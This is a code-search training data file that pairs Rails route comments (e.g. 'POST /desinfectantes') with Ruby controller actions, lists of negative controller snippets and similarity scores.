"def show\n @venta = Venta.find(params[:id])\n\n @domicilios = Domicilio.where(usuario_id: @venta.usuario.id)\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @venta }\n end\n end",
"def show\n @departamentos = Departamento.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @departamentos }\n end\n end",
"def index\n @pedidos = Pedido.find(:all, :conditions => [\"cliente_id=?\", session[:usuario_id]])\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @pedidos }\n end\n end",
"def index\n seleccionarMenu(:juzgados)\n @juzgados = Juzgado.order(:ciudad_id)\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @juzgados }\n end\n end",
"def index\n @dia_eventos = DiaEvento.all\n render json: @dia_eventos\n end",
"def create\n @desinfectante = Desinfectante.new(desinfectante_params)\n\n respond_to do |format|\n if @desinfectante.save\n format.html { redirect_to @desinfectante, notice: 'Desinfectante was successfully created.' }\n format.json { render :show, status: :created, location: @desinfectante }\n else\n format.html { render :new }\n format.json { render json: @desinfectante.errors, status: :unprocessable_entity }\n end\n end\n end",
"def index\n @calificaciones = Calificacion.order('created_at DESC').all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @calificaciones }\n end\n end",
"def new\n @expediente = Expediente.new\n @municipios = Municipio.all\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @expediente }\n end\n end",
"def destroy\n @ordenes_consumos_detalle.destroy\n respond_to do |format|\n format.html { redirect_to ordenes_consumos_detalles_url, notice: 'Ordenes consumos detalle was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def show\n @dependencia = Dependencia.find(params[:id])\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @dependencia }\n end\n end"
] |
[
"0.64389193",
"0.623495",
"0.61304295",
"0.60649556",
"0.60498655",
"0.6040296",
"0.6034668",
"0.60063785",
"0.59972966",
"0.5948474",
"0.59429896",
"0.59263563",
"0.59120077",
"0.5791583",
"0.5770066",
"0.5764881",
"0.5750057",
"0.57298476",
"0.5708329",
"0.568885",
"0.5684572",
"0.56839097",
"0.56837994",
"0.5669359",
"0.5662162",
"0.5658636",
"0.5651478",
"0.56486064",
"0.56473184",
"0.56461686",
"0.5643427",
"0.5630953",
"0.56269",
"0.5620598",
"0.5606203",
"0.5601379",
"0.55900514",
"0.5586249",
"0.5582011",
"0.5574526",
"0.5571033",
"0.5570386",
"0.55441856",
"0.5541231",
"0.553956",
"0.5537447",
"0.55243194",
"0.5523063",
"0.5521918",
"0.5515866",
"0.55129075",
"0.55063385",
"0.54980755",
"0.5496984",
"0.54951245",
"0.5493369",
"0.54817045",
"0.5479751",
"0.5473034",
"0.546635",
"0.5462105",
"0.5461047",
"0.5461002",
"0.5458767",
"0.5456985",
"0.545401",
"0.5452761",
"0.5450949",
"0.54507583",
"0.54399896",
"0.5436288",
"0.5431933",
"0.54302126",
"0.5429563",
"0.542847",
"0.5426565",
"0.54236835",
"0.54216284",
"0.5419622",
"0.5418953",
"0.54094887",
"0.54089713",
"0.54066485",
"0.54044133",
"0.5404172",
"0.5402918",
"0.5398547",
"0.53943396",
"0.53912264",
"0.5391212",
"0.53896767",
"0.53844196",
"0.53832775",
"0.537922",
"0.53767926",
"0.5372202",
"0.5369039",
"0.5360632",
"0.5360065",
"0.5343876"
] |
0.72310925
|
0
|
GET /desinfectantes/1 GET /desinfectantes/1.json
|
def show
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def index\n @desinfectantes = Desinfectante.all\n end",
"def show\n @descuento = Descuento.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @descuento }\n end\n end",
"def show\n @detalle = Detalle.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @detalle }\n end\n end",
"def show\n @deuda = Deuda.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @deuda }\n end\n end",
"def index\n @detalles = Detalle.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @detalles }\n end\n end",
"def show\n @depoevento = Depoevento.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @depoevento }\n end\n end",
"def index\n @antecedentes = Antecedente.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @antecedentes }\n end\n end",
"def index\n logement = Logement.find_by(id:params[:logement_id])\n equipement = logement.equi_securites[0].title\n equipements = logement.equi_securites[0]\n\n render json: {\n securites:equipement,\n fichier:equipements\n }\n end",
"def show\n @dependencia = Dependencia.find(params[:id])\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @dependencia }\n end\n end",
"def show\n @estudiante = Estudiante.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @estudiante }\n end\n end",
"def index\n @tipo_denuncia = TipoDenuncium.all\n\n render json: @tipo_denuncia\n end",
"def show\n @lista_contato = ListaContato.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @lista_contato }\n end\n end",
"def consulta\n fiesta = Fiesta.all\n render json: fiesta\n end",
"def show\n @respuesta = Respuesta.find(params[:id])\n\n render json: @respuesta\n end",
"def show\n @deporte= set_deporte\n render json: @deporte, status: :ok\n\n end",
"def show\n @humanidades2 = Humanidades2.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @humanidades2 }\n end\n end",
"def show\n @fulcliente = Fulcliente.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @fulcliente }\n end\n end",
"def show\n @ventas_seguimiento = Ventas::Seguimiento.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @ventas_seguimiento }\n end\n end",
"def show\n @solicitud_servicio = SolicitudServicio.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @solicitud_servicio }\n end\n end",
"def findreg\n @detalles = Detalle.find(params[:id])\n render json: @detalles\n end",
"def emergencias_en_curso\n @emergencies = Emergency.where(:estado => 'f')\n render json: @emergencies\n end",
"def show\n @antecedente = Antecedente.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @antecedente }\n end\n end",
"def show\n @indicativo = Indicativo.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @indicativo }\n end\n end",
"def show\n @venta = Venta.find(params[:id])\n\n @domicilios = Domicilio.where(usuario_id: @venta.usuario.id)\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @venta }\n end\n end",
"def index\n @deportes = Deporte.all\n render json: @deportes, status: :ok \n @deportes = Deporte.paginate(:page => params[:page])\n end",
"def show\n @servicio = Servicio.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @servicio }\n end\n end",
"def show\n @denuncia_tipo = DenunciaTipo.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @denuncia_tipo }\n end\n end",
"def show\n @conta = Conta.find(params[:id])\n respond_to do |format|\n format.html { render :show }\n format.json { render json: @conta, :include => {\n :movimentos => {\n :include => [:nota, :pessoa],\n :methods => [:favorecido],\n :except => [:created_at, :updated_at]\n }\n },\n :methods => [:saldo]\n }\n end\n end",
"def show\n @concedente = Concedente.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @concedente }\n end\n end",
"def show\n @diemtrentuyen = Diemtrentuyen.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @diemtrentuyen }\n end\n end",
"def show\n @espacio_deportivo = EspacioDeportivo.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @espacio_deportivo }\n end\n end",
"def show\n @humanidades1 = Humanidades1.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @humanidades1 }\n end\n end",
"def index\n @departamentos = Departamento.all\n\n render json: @departamentos\n end",
"def show\n @serv_adicionale = ServAdicionale.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @serv_adicionale }\n end\n end",
"def show\n @tecnico = Tecnico.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @tecnico }\n end\n end",
"def show\n @tecnico = Tecnico.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @tecnico }\n end\n end",
"def show\n @expediente = Expediente.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @expediente }\n end\n end",
"def show\n @respuesta = Respuesta.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @respuesta }\n end\n end",
"def show\n @consulta = Consulta.find(params[:id])\n\n render json: @consulta\n end",
"def show\n @status_del_admitido = StatusDelAdmitido.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @status_del_admitido }\n end\n end",
"def index\n @deporte_usuarios = DeporteUsuario.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @deporte_usuarios }\n end\n end",
"def show\n @calificacion_servicio = CalificacionServicio.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @calificacion_servicio }\n end\n end",
"def show\n @tecnico = Tecnico.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @tecnico }\n end\n end",
"def show\n\n @evento = Evento.find(params[:id])\n @comentarios = Comentario.where(:comentavel_id => @evento.id, :comentavel_type => \"Evento\").order('created_at DESC')\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @evento }\n end\n end",
"def show\n @ejercicio = Ejercicio.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @ejercicio }\n end\n end",
"def show\n @tipo_convenio = TipoConvenio.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @tipo_convenio }\n end\n end",
"def index\n @ofertas = Oferta.where(:status_id => Status.find_by_descricao('Ativo'))\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render :json => @ofertas }\n end\n end",
"def show\n @status_de_la_inscripcion = StatusDeLaInscripcion.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @status_de_la_inscripcion }\n end\n end",
"def show\n @tipo_atendimento = TipoAtendimento.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @tipo_atendimento }\n end\n end",
"def show\n @local_deportivo = LocalDeportivo.find(params[:id], :conditions=> \"estado = 'C' OR estado is NULL\")\n \n @espacio_deportivos = @local_deportivo.espacio_deportivos.find(:all)\n \n \n respond_to do |format|\n format.html \n format.json { render json: {:espacio_deportivos =>@espacio_deportivos, :local_deportivo => @local_deportivo }}\n end\n \n end",
"def show\n @comentario = Comentario.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @comentario }\n end\n end",
"def show\n @comentario = Comentario.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @comentario }\n end\n end",
"def show\n render json: @departamento\n end",
"def show\n @etudiant = Etudiant.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @etudiant }\n end\n end",
"def show\n @adicional_desconto = AdicionalDesconto.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @adicional_desconto }\n end\n end",
"def index\n @ventas = Venta.order(\"fecha desc\")\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @ventas }\n end\n end",
"def show\n @indicacao = Indicacao.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @indicacao }\n end\n end",
"def show\n @compra_detalle = CompraDetalle.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @compra_detalle }\n end\n end",
"def show\n @sugerencia = Sugerencia.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @sugerencia }\n end\n end",
"def index\n\n if params[:ventas_seguimiento]\n cliente_id = params[:ventas_seguimiento][:cliente_id]\n @ventas_seguimientos = Ventas::Seguimiento.where(\"cliente_id = ?\",cliente_id).order(\"created_at DESC\").paginate(:page => params[:page], :per_page => 5)\n @seguimientos = Ventas::Seguimiento.new(:cliente_id => cliente_id)\n else\n @ventas_seguimientos = Ventas::Seguimiento.order(\"created_at DESC\").paginate(:page => params[:page], :per_page => 5)\n @seguimientos = Ventas::Seguimiento.new\n end\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @ventas_seguimientos }\n end\n end",
"def index\n @detpedidos = Detpedido.all\n end",
"def show\n @sezione = Sezione.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @sezione }\n end\n end",
"def show\n @tipo_negocio = TipoNegocio.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @tipo_negocio }\n end\n end",
"def destroy\n @desinfectante.destroy\n respond_to do |format|\n format.html { redirect_to desinfectantes_url, notice: 'Desinfectante was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def show\n @sitio_entrega = SitioEntrega.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @sitio_entrega }\n end\n end",
"def index\n find_dependencias\n respond_to do |format|\n format.html\n format.json { render :json => @dependencias.to_json(:methods => :alias_or_fullname, :only => [:id, :codigo, :nombre])}\n\n end\n end",
"def show\n @cliente = Cliente.find(params[:cliente_id])\n @pago = @cliente.pagos.find(params[:id])\n \n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @pago }\n end\n end",
"def show\n @pedido = Pedido.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @pedido }\n end\n end",
"def show\n @veiculo = Veiculo.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @veiculo }\n end\n end",
"def show\n @interventoriasfecha = Interventoriasfecha.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @interventoriasfecha }\n end\n end",
"def show\n @movimentacao_de_estoque = MovimentacaoDeEstoque.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @movimentacao_de_estoque }\n end\n end",
"def show\n @leito = Leito.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @leito }\n end\n end",
"def show\n @empresa_servicio = EmpresaServicio.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @empresa_servicio }\n end\n end",
"def new\n @lista_contato = ListaContato.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @lista_contato }\n end\n end",
"def show\n @status_del_tramite_de_beca = StatusDelTramiteDeBeca.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @status_del_tramite_de_beca }\n end\n end",
"def new\n @descuento = Descuento.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @descuento }\n end\n end",
"def show\n @estacionamiento = Estacionamiento.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @estacionamiento }\n end\n end",
"def index\n @status_del_admitidos = StatusDelAdmitido.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @status_del_admitidos }\n end\n end",
"def show\n @faixa_de_desconto = FaixaDeDesconto.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @faixa_de_desconto }\n end\n end",
"def new\n @detalle = Detalle.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @detalle }\n end\n end",
"def show\n @asiento = Asiento.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @asiento }\n end\n end",
"def show\n @tipo_contrato = TipoContrato.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @tipo_contrato }\n end\n end",
"def show\n @excepcion_entrega = ExcepcionEntrega.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @excepcion_entrega }\n end\n end",
"def show\n @liste = Liste.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @liste }\n end\n end",
"def show\n @historial = Historial.find(params[:id])\n @receta = Recete.histori(@historial.id)\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @historial }\n end\n end",
"def new\n @deuda = Deuda.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @deuda }\n end\n end",
"def index\n @enderecos = Endereco.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @enderecos }\n end\n end",
"def show\n @cliente = Cliente.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @cliente }\n end\n end",
"def show\n @cliente = Cliente.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @cliente }\n end\n end",
"def show\n @cliente = Cliente.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @cliente }\n end\n end",
"def show\n @arquivo = Arquivo.find(params[:id])\n @comentarios = Comentario.where(:comentavel_id => @arquivo.id, :comentavel_type => \"Arquivo\").order('created_at DESC')\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @arquivo }\n end\n end",
"def new\n @servicio = Servicio.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render :json => @servicio }\n end\n end",
"def show\n @unidades = Unidade.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @unidades }\n end\n end",
"def index\n @pedidos = Pedido.find(:all, :conditions => [\"cliente_id=?\", session[:usuario_id]])\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @pedidos }\n end\n end",
"def show\n @requerimiento ||= Requerimiento.where(:numero => params[:id]).first\n @areas = Area.where(\" nombre like '%DIT%' \")\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @requerimiento }\n end\n end",
"def show\n @ficha = Ficha.find(params[:id])\n \n respond_to do |format| \n format.html # show.html.erb\n format.json { render json: @ficha } \n end\n end",
"def index\n @instituicoes = Instituicao.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @instituicoes }\n end\n end",
"def show\n @receipe = Receipe.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @receipe }\n end\n end",
"def new\n @uf = Uf.first\n @municipios = @uf.municipios\n @cargo_eleicao = Eleicao.find(:first, :conditions => \"status = true\").cargo_eleicaos\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @cargo_eleicao }\n end\n end",
"def show\n @dato = Dato.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @dato }\n end\n end",
"def index\n @peticion_servicio_tis = Peticion::ServicioTi.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @peticion_servicio_tis }\n end\n end"
] |
[
"0.69370973",
"0.6734477",
"0.6544041",
"0.64997417",
"0.64963436",
"0.63957137",
"0.6391741",
"0.6373035",
"0.6369591",
"0.63553333",
"0.6354211",
"0.6327558",
"0.63217884",
"0.62959665",
"0.6290628",
"0.6253627",
"0.6242099",
"0.62330043",
"0.6230897",
"0.6227246",
"0.6225376",
"0.622461",
"0.62112516",
"0.62080854",
"0.6206604",
"0.6202283",
"0.6192155",
"0.619071",
"0.6168241",
"0.6165436",
"0.61614007",
"0.6161342",
"0.61589676",
"0.6150791",
"0.61453056",
"0.61453056",
"0.61451536",
"0.614435",
"0.61358446",
"0.6133087",
"0.61318713",
"0.6128917",
"0.61276037",
"0.6120934",
"0.6114496",
"0.6111097",
"0.6104328",
"0.6102033",
"0.60990494",
"0.60868686",
"0.60783255",
"0.60783255",
"0.60752547",
"0.60641074",
"0.6060997",
"0.6059904",
"0.60556656",
"0.60539883",
"0.6037348",
"0.60288197",
"0.60282534",
"0.6021808",
"0.60175127",
"0.60149825",
"0.6004707",
"0.60002935",
"0.59981054",
"0.5994752",
"0.5987307",
"0.59807837",
"0.59805644",
"0.59772086",
"0.5976081",
"0.5975577",
"0.59744513",
"0.5973679",
"0.59720135",
"0.59662044",
"0.5965444",
"0.59636074",
"0.59614164",
"0.59561086",
"0.59487903",
"0.5948588",
"0.5943623",
"0.5942193",
"0.5938739",
"0.5927373",
"0.5927373",
"0.5927373",
"0.59211844",
"0.59203327",
"0.5916864",
"0.5914984",
"0.5908963",
"0.5905153",
"0.5903785",
"0.5901572",
"0.58966506",
"0.5895674",
"0.5892937"
] |
0.0
|
-1
|
POST /desinfectantes POST /desinfectantes.json
|
def create
@desinfectante = Desinfectante.new(desinfectante_params)
respond_to do |format|
if @desinfectante.save
format.html { redirect_to @desinfectante, notice: 'Desinfectante was successfully created.' }
format.json { render :show, status: :created, location: @desinfectante }
else
format.html { render :new }
format.json { render json: @desinfectante.errors, status: :unprocessable_entity }
end
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def desinfectante_params\n params.require(:desinfectante).permit(:marca, :tipo, :precio, :presentacion, :stock, :liquido)\n end",
"def destroy\n @desinfectante.destroy\n respond_to do |format|\n format.html { redirect_to desinfectantes_url, notice: 'Desinfectante was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def index\n @desinfectantes = Desinfectante.all\n end",
"def create\n logger.debug(\"Creando calabaza aa #{params[:deuda][:deuda_original_id]} #{params}\")\n @deuda = Deuda.new(params[:deuda])\n if(params[:deuda].has_key?(:deuda_original_id))\n logger.debug(\"Se slecciono deuda original\")\n if(@deuda.credito.present?)\n logger.debug(\"Estaba asociado con un credito\")\n @deuda.credito.deudas.delete(@deuda)\n end\n @deuda.credito_id=nil\n end\n\n respond_to do |format|\n if @deuda.save\n format.html { redirect_to @deuda, notice: 'Deuda was successfully created.' }\n format.json { render json: @deuda, status: :created, location: @deuda }\n else\n format.html { render action: \"new\" }\n format.json { render json: @deuda.errors, status: :unprocessable_entity }\n end\n end\n end",
"def set_desinfectante\n @desinfectante = Desinfectante.find(params[:id])\n end",
"def desafio_params\n params.require(:desafio).permit(:tipo, :titulo, :descripcion, :puntos)\n end",
"def create\n @desafio = Desafio.new(desafio_params)\n\n respond_to do |format|\n if @desafio.save\n format.html { redirect_to @desafio, notice: 'Desafio was successfully created.' }\n format.json { render :show, status: :created, location: @desafio }\n else\n format.html { render :new }\n format.json { render json: @desafio.errors, status: :unprocessable_entity }\n end\n end\n end",
"def descuento_adicional_params\n params.require(:descuento_adicional).permit(:descuento_adicional, :detalle)\n end",
"def detalle_params\n params.require(:detalle).permit(:nofra, :codigoprd, :cantidad, :impuesto, :precio)\n end",
"def destroy\n @inscripcion_diplomado.destroy\n respond_to do |format|\n format.html { redirect_to inscripcion_diplomados_url, notice: 'La inscripción al diplomado fue eliminada correctamente.' }\n format.json { head :no_content }\n end\n end",
"def create\n @detpedido = Detpedido.new(detpedido_params)\n\n respond_to do |format|\n if @detpedido.save\n format.html { redirect_to @detpedido, notice: 'Detpedido was successfully created.' }\n format.json { render :show, status: :created, location: @detpedido }\n else\n format.html { render :new }\n format.json { render json: @detpedido.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @detalle = Detalle.new(params[:detalle])\n\n respond_to do |format|\n if @detalle.save\n format.html { redirect_to @detalle, notice: 'Detalle was successfully created.' }\n format.json { render json: @detalle, status: :created, location: @detalle }\n else\n format.html { render action: \"new\" }\n format.json { render json: @detalle.errors, status: :unprocessable_entity }\n end\n end\n end",
"def deuda_params\n params.require(:deuda).permit(:nombre, :correo, :telefono, :valor, :interes, :descripcion, :tipo, :usuario)\n end",
"def destroy\n @detalle.destroy\n respond_to do |format|\n format.html { redirect_to detalles_url, notice: 'Detalle was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def create\n @detalle = Detalle.new(detalle_params)\n\n respond_to do |format|\n if @detalle.save\n format.html { redirect_to @detalle, notice: 'Detalle was successfully created.' }\n format.json { render :show, status: :created, location: @detalle }\n else\n format.html { render :new }\n format.json { render json: @detalle.errors, status: :unprocessable_entity }\n end\n end\n end",
"def destroy\n @desafio.destroy\n respond_to do |format|\n format.html { redirect_to desafios_url, notice: 'Desafio was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def create\n\n if !params[:disponibilite][:creneau_ids].nil?\n\n Disponibilite.where(enseignant_id: params[:disponibilite][:enseignant_id]).where(jour_id: params[:disponibilite][:jour_id]).where(ecole_id: ecole.id).destroy_all\n\n params[:disponibilite][:creneau_ids].each do |creneau|\n Disponibilite.create(enseignant_id: params[:disponibilite][:enseignant_id], jour_id: params[:disponibilite][:jour_id], user_id: current_user.id, ecole_id: ecole.id, creneau_id: creneau)\n end\n redirect_to disponibilites_url\n #@disponibilite = current_user.disponibilites.new(disponibilite_params)\n else\n redirect_to new_disponibilite_path, notice: \"Veuillez choisir des heures pour la disponibilité du prof\"\n end\n\n end",
"def destroy\n @fornecedor.destroy\n addlog(\"Fornecedor apagado\")\n respond_to do |format|\n format.html { redirect_to fornecedores_url, notice: 'Fornecedor apagado com sucesso.' }\n format.json { head :no_content }\n end\n end",
"def create\n @objeto = DetallePedido.new(detalle_pedido_params)\n\n respond_to do |format|\n if @objeto.save\n set_redireccion\n format.html { redirect_to @redireccion, notice: 'Detalle pedido was successfully created.' }\n format.json { render :show, status: :created, location: @objeto }\n else\n format.html { render :new }\n format.json { render json: @objeto.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @serie_detalle = SerieDetalle.new(serie_detalle_params)\n\n respond_to do |format|\n if @serie_detalle.save\n format.html { redirect_to @serie_detalle, notice: 'Serie detalle was successfully created.' }\n format.json { render :show, status: :created, location: @serie_detalle }\n else\n format.html { render :new }\n format.json { render json: @serie_detalle.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new\n @depoevento = Depoevento.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @depoevento }\n end\n end",
"def destroy\n @informacioncomercial.destroy\n respond_to do |format|\n format.html { redirect_to informacioncomercials_url, notice: 'Informacioncomercial was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @descuento_adicional.destroy\n respond_to do |format|\n format.html { redirect_to descuento_adicionals_url, notice: 'Descuento adicional fue eliminado exitosamente.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @detalle_factura.destroy\n respond_to do |format|\n format.html { redirect_to detalle_facturas_url, notice: 'Detalle factura was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def new\n \n @selecciones = Seleccion.where(\"cliente_id = ?\",usuario_actual.id)\n respond_to do |format|\n unless @selecciones.empty?\n @peso_total = Seleccion.peso_total(usuario_actual.id)\n @precio_total = Seleccion.precio_total(usuario_actual.id)\n @tarjetas = usuario_actual.tdc\n @orden = Orden.new(:direccion_entrega=>usuario_actual.direccion)\n t = Time.now\n fecha = t.strftime(\"%Y-%m-%d\")\n client = Savon::Client.new(\"http://192.168.1.121/DistribuidorFIF/webservices/servicio.php?wsdl\")\n preorden = \"<solicitud_pedido>\n <num_orden>001</num_orden>\n <nombre_comercio>Tukiosquito</nombre_comercio>\n <fecha_solicitud>\"+fecha.to_s+\"</fecha_solicitud>\n <nombre_cliente>\"+usuario_actual.nombre+\" \"+usuario_actual.apellido+\"</nombre_cliente>\n <direccion_comercio>\n <avenida>Sucre</avenida>\n <calle>-</calle>\n <edificio_casa>CC Millenium</edificio_casa>\n <local_apt>C1-15</local_apt>\n <parroquia>Leoncio Martinez</parroquia>\n <municipio>Sucre</municipio>\n <ciudad>Caracas</ciudad>\n <estado>Miranda</estado>\n <pais>Venezuela</pais>\n </direccion_comercio>\n <direccion_destino>\n <avenida>Santa Rosa</avenida>\n <calle>Tierras Rojas</calle>\n <edificio_casa>Villa Magica</edificio_casa>\n <local_apt>69</local_apt>\n <parroquia> </parroquia>\n <municipio>Zamora</municipio>\n <ciudad>Cua</ciudad>\n <estado>Miranda</estado>\n <pais>Venezuela</pais>\n </direccion_destino>\"\n @selecciones.each do |seleccion|\n p = Producto.find(seleccion.producto_id)\n preorden = preorden+\"\n <articulo>\n <id>\"+p.id.to_s+\"</id>\n <descripcion>\"+p.descripcion+\"</descripcion>\n <peso>\"+p.peso.to_s+\"</peso>\n <cantidad>\"+seleccion.cantidad.to_s+\"</cantidad>\n <precio>\"+p.precio.to_s+\"</precio>\n </articulo>\"\n end\n preorden = preorden+\"</solicitud_pedido>\"\n response = client.request :ejemplo, body: { \"value\" => preorden } \n if response.success? \n respuesta = response.to_hash[:ejemplo_response][:return]\n datos = XmlSimple.xml_in(respuesta)\n end\n\n @precio_envio = datos[\"num_orden\"][0]\n #@arreglo = XmlSimple.xml_in('')\n #@xml = XmlSimple.xml_out(@arreglo, { 'RootName' => 'solicitud_pedido' })\n #url = 'http://192.168.1.101/Antonio/tukyosquito/proyecto/servicio/servicio.php'\n #cotizacion = SOAP::RPC::Driver.new(url)\n #cotizacion.add_method('obtener','asd')\n #tdc = Tarjeta.where(\"id = ? AND cliente_id = ?\",params[:orden][:tarjeta_id],usuario_actual.id)\n #@respuesta = cotizacion.obtener('123')\n format.html # new.html.erb\n else\n format.html { redirect_to carrito_path, notice: 'No tiene productos agregados al carro de compras para generar una orden.' }\n end\n end\n end",
"def descuento_adicional_params\n params.require(:descuento_adicional).permit(:detalle_descuento, :descuento_adicional)\n end",
"def despesa_params\n params.require(:despesa).permit(:descricao, :data, :valor, :observacao, :anexo, :tenant_id, :user_id, :fornecedor_id, :tipo_despesa_id, :condominio_id, :forma_pagamento_id)\n end",
"def destroy\n @informacao_ged.destroy\n respond_to do |format|\n format.html { redirect_to informacoes_ged_url }\n format.json { head :no_content }\n end\n end",
